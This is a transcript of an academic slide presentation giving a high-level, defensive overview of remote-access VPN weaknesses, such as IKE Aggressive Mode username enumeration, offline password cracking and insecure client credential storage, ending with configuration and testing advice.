VPN AND SECURITY FLAWS

Download Report

Transcript VPN AND SECURITY FLAWS 

VPN AND SECURITY
FLAWS
Rajesh Perumal
Clemson University
VPN – AN ATTRACTIVE TARGET
 Carry Sensitive information
 Remote access VPNs exposes entire
internal network
 Intrusion Detection Systems cannot
Monitor VPN Traffic
 Increase in security in Internet
servers makes VPN a tempting
Target.
VPN FLAWS
 Insecure storage of Authentication
credentials by VPN Clients
 Username Enumeration Vulnerabilities
 Offline Password Cracking
 Man in the Middle Attacks
 Lack of Account Lockout
 Poor Default Configurations
 Poor Guidance and Documentation
Insecure storage of Authentication
credentials by VPN Clients
 Storing the username unencrypted in
a file or the registry
 Storing password in scrambled form
or obfuscated form
 Physical memory dumps can reveal
plain text passwords
 Caching credentials
Username Enumeration
Vulnerabilities
 IKE Aggressive Mode with PSK will
prompt or give clue the hacker, the
login name is incorrect. So the hacker
can deduce the correct user names.
Offline Password Cracking
 Easy to obtain Hash function.
 Responder hash is obtained
 Dictionary attack on the password will
reveal in feasible amount.
Man in the Middle Attacks
 By installing a packet sniffing system between the
VPN client and server , we can sniff clear text user
names and the password can be cracked by the 1st
and 2nd packets of the IKE Aggressive mode
exchange.
 The sniffing system (SS), acts as a server for the
client and as a client for the server. SS can get
passwords, user names and ISAKMP message from
the client and issue its own ISAKMP message.
Similarly the sniffer can send its own ISAKMP
message, since the user name and password is
known.
Poor Guidance and Documentation
 End user is not provided with proper
documentation and is not well
informed to take proper decisions.
 User goes with default settings,
default encryption.
CONCLUSION







Remote access VPN systems , 90% have had significant
security issues.
Cryptographic Techniques adopted are strong but
vulnerabilities are due to poor configuration.
Well accepted security practices are not adopted.
Info leaking about valid usernames is prevented in OS but not
in VPN.
Users make Default configuration on the basis of ease of use
rather than security. Eg. IKE Aggressive mode with PSK
authentication
Users do not know the intensity of bad Configuration options.
Proper testing is needed. Tools like “ike – scan” should help
testing the VPN.